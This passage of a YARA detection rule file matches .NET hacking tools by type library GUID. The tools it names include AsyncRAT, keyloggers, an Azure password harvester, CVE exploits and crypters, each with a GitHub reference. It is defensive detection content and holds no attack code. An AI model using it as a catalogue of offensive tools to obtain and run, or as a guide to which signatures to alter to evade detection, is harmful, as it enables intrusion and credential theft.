    date = "2020-12-13"
  strings:
    $typelibguid0 = "1e54637b-c887-42a9-af6a-b4bd4e28cda9" ascii wide nocase
    $typelibguid1 = "198d5599-d9fc-4a74-87f4-5077318232ad" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Pen_Test_Tools {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/awillard1/Pen-Test-Tools"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "922e7fdc-33bf-48de-bc26-a81f85462115" ascii wide nocase
    $typelibguid1 = "ad5205dd-174d-4332-96d9-98b076d6fd82" ascii wide nocase
    $typelibguid2 = "b67e7550-f00e-48b3-ab9b-4332b1254a86" ascii wide nocase
    $typelibguid3 = "5e95120e-b002-4495-90a1-cd3aab2a24dd" ascii wide nocase
    $typelibguid4 = "295017f2-dc31-4a87-863d-0b9956c2b55a" ascii wide nocase
    $typelibguid5 = "abbaa2f7-1452-43a6-b98e-10b2c8c2ba46" ascii wide nocase
    $typelibguid6 = "a4043d4c-167b-4326-8be4-018089650382" ascii wide nocase
    $typelibguid7 = "51abfd75-b179-496e-86db-62ee2a8de90d" ascii wide nocase
    $typelibguid8 = "a06da7f8-f87e-4065-81d8-abc33cb547f8" ascii wide nocase
    $typelibguid9 = "ee510712-0413-49a1-b08b-1f0b0b33d6ef" ascii wide nocase
    $typelibguid10 = "9780da65-7e25-412e-9aa1-f77d828819d6" ascii wide nocase
    $typelibguid11 = "7913fe95-3ad5-41f5-bf7f-e28f080724fe" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_The_Collection {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Tlgyt/The-Collection"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "579159ff-3a3d-46a7-b069-91204feb21cd" ascii wide nocase
    $typelibguid1 = "5b7dd9be-c8c3-4c4f-a353-fefb89baa7b3" ascii wide nocase
    $typelibguid2 = "43edcb1f-3098-4a23-a7f2-895d927bc661" ascii wide nocase
    $typelibguid3 = "5f19919d-cd51-4e77-973f-875678360a6f" ascii wide nocase
    $typelibguid4 = "17fbc926-e17e-4034-ba1b-fb2eb57f5dd3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Change_Lockscreen {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/nccgroup/Change-Lockscreen"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "78642ab3-eaa6-4e9c-a934-e7b0638bc1cc" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_LOLBITS {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Kudaes/LOLBITS"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "29d09aa4-ea0c-47c2-973c-1d768087d527" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Keylogger {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/BlackVikingPro/Keylogger"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "7afbc9bf-32d9-460f-8a30-35e30aa15879" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_CVE_2020_1337 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/neofito/CVE-2020-1337"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "d9c2e3c1-e9cc-42b0-a67c-b6e1a4f962cc" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpLogger {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/djhohnstein/SharpLogger"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "36e00152-e073-4da8-aa0c-375b6dd680c4" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_AsyncRAT_C_Sharp {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "619b7612-dfea-442a-a927-d997f99c497b" ascii wide nocase
    $typelibguid1 = "424b81be-2fac-419f-b4bc-00ccbe38491f" ascii wide nocase
    $typelibguid2 = "37e20baf-3577-4cd9-bb39-18675854e255" ascii wide nocase
    $typelibguid3 = "dafe686a-461b-402b-bbd7-2a2f4c87c773" ascii wide nocase
    $typelibguid4 = "ee03faa9-c9e8-4766-bd4e-5cd54c7f13d3" ascii wide nocase
    $typelibguid5 = "8bfc8ed2-71cc-49dc-9020-2c8199bc27b6" ascii wide nocase
    $typelibguid6 = "d640c36b-2c66-449b-a145-eb98322a67c8" ascii wide nocase
    $typelibguid7 = "8de42da3-be99-4e7e-a3d2-3f65e7c1abce" ascii wide nocase
    $typelibguid8 = "bee88186-769a-452c-9dd9-d0e0815d92bf" ascii wide nocase
    $typelibguid9 = "9042b543-13d1-42b3-a5b6-5cc9ad55e150" ascii wide nocase
    $typelibguid10 = "6aa4e392-aaaf-4408-b550-85863dd4baaf" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DarkFender {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0xyg3n/DarkFender"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "12fdf7ce-4a7c-41b6-9b32-766ddd299beb" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_MinerDropper {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/DylanAlloy/MinerDropper"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "46a7af83-1da7-40b2-9d86-6fd6223f6791" ascii wide nocase
    $typelibguid1 = "8433a693-f39d-451b-955b-31c3e7fa6825" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpDomainSpray {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/HunnicCyber/SharpDomainSpray"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "76ffa92b-429b-4865-970d-4e7678ac34ea" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_iSpyKeylogger {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/mwsrc/iSpyKeylogger"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "ccc0a386-c4ce-42ef-aaea-b2af7eff4ad8" ascii wide nocase
    $typelibguid1 = "816b8b90-2975-46d3-aac9-3c45b26437fa" ascii wide nocase
    $typelibguid2 = "279b5533-d3ac-438f-ba89-3fe9de2da263" ascii wide nocase
    $typelibguid3 = "88d3dc02-2853-4bf0-b6dc-ad31f5135d26" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SolarFlare {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/mubix/solarflare"
    author = "Arnim Rupp"
    date = "2020-12-15"
  strings:
    $typelibguid0 = "ca60e49e-eee9-409b-8d1a-d19f1d27b7e4" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Snaffler {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/SnaffCon/Snaffler"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "2aa060b4-de88-4d2a-a26a-760c1cefec3e" ascii wide nocase
    $typelibguid1 = "b118802d-2e46-4e41-aac7-9ee890268f8b" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpShares {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/djhohnstein/SharpShares/"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "fe9fdde5-3f38-4f14-8c64-c3328c215cf2" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpEDRChecker {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/PwnDexter/SharpEDRChecker"
    author = "Arnim Rupp"
    date = "2020-12-18"
  strings:
    $typelibguid0 = "bdfee233-3fed-42e5-aa64-492eb2ac7047" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpClipHistory {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/FSecureLABS/SharpClipHistory"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "1126d5b4-efc7-4b33-a594-b963f107fe82" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpGPO_RemoteAccessPolicies {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "fbb1abcf-2b06-47a0-9311-17ba3d0f2a50" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Absinthe {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/cameronhotchkies/Absinthe"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "9936ae73-fb4e-4c5e-a5fb-f8aaeb3b9bd6" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ExploitRemotingService {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/tyranid/ExploitRemotingService"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "fd17ae38-2fd3-405f-b85b-e9d14e8e8261" ascii wide nocase
    $typelibguid1 = "1850b9bb-4a23-4d74-96b8-58f274674566" ascii wide nocase
    $typelibguid2 = "297cbca1-efa3-4f2a-8d5f-e1faf02ba587" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Xploit {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/shargon/Xploit"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "4545cfde-9ee5-4f1b-b966-d128af0b9a6e" ascii wide nocase
    $typelibguid1 = "33849d2b-3be8-41e8-a1e2-614c94c4533c" ascii wide nocase
    $typelibguid2 = "c2dc73cc-a959-4965-8499-a9e1720e594b" ascii wide nocase
    $typelibguid3 = "77059fa1-4b7d-4406-bc1a-cb261086f915" ascii wide nocase
    $typelibguid4 = "a4a04c4d-5490-4309-9c90-351e5e5fd6d1" ascii wide nocase
    $typelibguid5 = "ca64f918-3296-4b7d-9ce6-b98389896765" ascii wide nocase
    $typelibguid6 = "10fe32a0-d791-47b2-8530-0b19d91434f7" ascii wide nocase
    $typelibguid7 = "679bba57-3063-4f17-b491-4f0a730d6b02" ascii wide nocase
    $typelibguid8 = "0981e164-5930-4ba0-983c-1cf679e5033f" ascii wide nocase
    $typelibguid9 = "2a844ca2-5d6c-45b5-963b-7dca1140e16f" ascii wide nocase
    $typelibguid10 = "7d75ca11-8745-4382-b3eb-c41416dbc48c" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_PoC {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/thezdi/PoC"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "89f9d411-e273-41bb-8711-209fd251ca88" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpGPOAbuse {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/FSecureLABS/SharpGPOAbuse"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "4f495784-b443-4838-9fa6-9149293af785" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Watson {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rasta-mouse/Watson"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "49ad5f38-9e37-4967-9e84-fe19c7434ed7" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_StandIn {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/FuzzySecurity/StandIn"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "01c142ba-7af1-48d6-b185-81147a2f7db7" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_azure_password_harvesting {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/guardicore/azure_password_harvesting"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "7ad1ff2d-32ac-4c54-b615-9bb164160dac" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_PowerOPS {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/fdiskyou/PowerOPS"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "2a3c5921-7442-42c3-8cb9-24f21d0b2414" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Random_CSharpTools {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/xorrior/Random-CSharpTools"
    author = "Arnim Rupp"
    date = "2020-12-21"
  strings:
    $typelibguid0 = "f7fc19da-67a3-437d-b3b0-2a257f77a00b" ascii wide nocase
    $typelibguid1 = "47e85bb6-9138-4374-8092-0aeb301fe64b" ascii wide nocase
    $typelibguid2 = "c7d854d8-4e3a-43a6-872f-e0710e5943f7" ascii wide nocase
    $typelibguid3 = "d6685430-8d8d-4e2e-b202-de14efa25211" ascii wide nocase
    $typelibguid4 = "1df925fc-9a89-4170-b763-1c735430b7d0" ascii wide nocase
    $typelibguid5 = "817cc61b-8471-4c1e-b5d6-c754fc550a03" ascii wide nocase
    $typelibguid6 = "60116613-c74e-41b9-b80e-35e02f25891e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_CVE_2020_0668 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/RedCursorSecurityConsulting/CVE-2020-0668"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "1b4c5ec1-2845-40fd-a173-62c450f12ea5" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_WindowsRpcClients {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/tyranid/WindowsRpcClients"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "843d8862-42eb-49ee-94e6-bca798dd33ea" ascii wide nocase
    $typelibguid1 = "632e4c3b-3013-46fc-bc6e-22828bf629e3" ascii wide nocase
    $typelibguid2 = "a2091d2f-6f7e-4118-a203-4cea4bea6bfa" ascii wide nocase
    $typelibguid3 = "950ef8ce-ec92-4e02-b122-0d41d83065b8" ascii wide nocase
    $typelibguid4 = "d51301bc-31aa-4475-8944-882ecf80e10d" ascii wide nocase
    $typelibguid5 = "823ff111-4de2-4637-af01-4bdc3ca4cf15" ascii wide nocase
    $typelibguid6 = "5d28f15e-3bb8-4088-abe0-b517b31d4595" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpFruit {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rvrsh3ll/SharpFruit"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "3da2f6de-75be-4c9d-8070-08da45e79761" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpWitness {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rasta-mouse/SharpWitness"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "b9f6ec34-4ccc-4247-bcef-c1daab9b4469" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_RexCrypter {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/syrex1013/RexCrypter"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "10cd7c1c-e56d-4b1b-80dc-e4c496c5fec5" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharPersist {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/fireeye/SharPersist"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "9d1b853e-58f1-4ba5-aefc-5c221ca30e48" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_CVE_2019_1253 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/padovah4ck/CVE-2019-1253"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "584964c1-f983-498d-8370-23e27fdd0399" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_scout {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/jaredhaight/scout"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "d9c76e82-b848-47d4-8f22-99bf22a8ee11" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Grouper2 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/l0ss/Grouper2/"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "5decaea3-2610-4065-99dc-65b9b4ba6ccd" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_CasperStager {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/ustayready/CasperStager"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "c653a9f2-0939-43c8-9b93-fed5e2e4c7e6" ascii wide nocase
    $typelibguid1 = "48dfc55e-6ae5-4a36-abef-14bc09d7510b" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_TellMeYourSecrets {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0xbadjuju/TellMeYourSecrets"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "9b448062-7219-4d82-9a0a-e784c4b3aa27" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpExcel4_DCOM {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rvrsh3ll/SharpExcel4-DCOM"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "68b83ce5-bbd9-4ee3-b1cc-5e9223fab52b" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpShooter {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/mdsecactivebreach/SharpShooter"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "56598f1c-6d88-4994-a392-af337abe5777" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_NoMSBuild {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rvrsh3ll/NoMSBuild"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "034a7b9f-18df-45da-b870-0e1cef500215" ascii wide nocase
    $typelibguid1 = "59b449d7-c1e8-4f47-80b8-7375178961db" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_TeleShadow2 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/ParsingTeam/TeleShadow2"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "42c5c356-39cf-4c07-96df-ebb0ccf78ca4" ascii wide nocase
    $typelibguid1 = "0242b5b1-4d26-413e-8c8c-13b4ed30d510" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_BadPotato {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/BeichenDream/BadPotato"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "0527a14f-1591-4d94-943e-d6d784a50549" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_LethalHTA {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/codewhitesec/LethalHTA"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "784cde17-ff0f-4e43-911a-19119e89c43f" ascii wide nocase
    $typelibguid1 = "7e2de2c0-61dc-43ab-a0ec-c27ee2172ea6" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpStat {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Raikia/SharpStat"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "ffc5c721-49c8-448d-8ff4-2e3a7b7cc383" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SneakyService {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/malcomvetter/SneakyService"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "897819d5-58e0-46a0-8e1a-91ea6a269d84" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpExec {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/anthemtotheego/SharpExec"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "7fbad126-e21c-4c4e-a9f0-613fcf585a71" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpCOM {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rvrsh3ll/SharpCOM"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "51960f7d-76fe-499f-afbd-acabd7ba50d1" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Inception {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/two06/Inception"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "03d96b8c-efd1-44a9-8db2-0b74db5d247a" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_sharpwmi {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/QAX-A-Team/sharpwmi"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "bb357d38-6dc1-4f20-a54c-d664bd20677e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_CVE_2019_1064 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/RythmStick/CVE-2019-1064"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "ff97e98a-635e-4ea9-b2d0-1a13f6bdbc38" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Tokenvator {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0xbadjuju/Tokenvator"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "4b2b3bd4-d28f-44cc-96b3-4a2f64213109" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_WheresMyImplant {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0xbadjuju/WheresMyImplant"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "cca59e4e-ce4d-40fc-965f-34560330c7e6" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Naga {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/byt3bl33d3r/Naga"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "99428732-4979-47b6-a323-0bb7d6d07c95" ascii wide nocase
    $typelibguid1 = "a2c9488f-6067-4b17-8c6f-2d464e65c535" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpBox {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/P1CKLES/SharpBox"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "616c1afb-2944-42ed-9951-bf435cadb600" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_rundotnetdll32 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0xbadjuju/rundotnetdll32"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "a766db28-94b6-4ed1-aef9-5200bbdd8ca7" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_AntiDebug {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/malcomvetter/AntiDebug"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "997265c1-1342-4d44-aded-67964a32f859" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DInvisibleRegistry {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NVISO-BE/DInvisibleRegistry"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "31d576fb-9fb9-455e-ab02-c78981634c65" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_TikiTorch {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rasta-mouse/TikiTorch"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "806c6c72-4adc-43d9-b028-6872fa48d334" ascii wide nocase
    $typelibguid1 = "2ef9d8f7-6b77-4b75-822b-6a53a922c30f" ascii wide nocase
    $typelibguid2 = "8f5f3a95-f05c-4dce-8bc3-d0a0d4153db6" ascii wide nocase
    $typelibguid3 = "1f707405-9708-4a34-a809-2c62b84d4f0a" ascii wide nocase
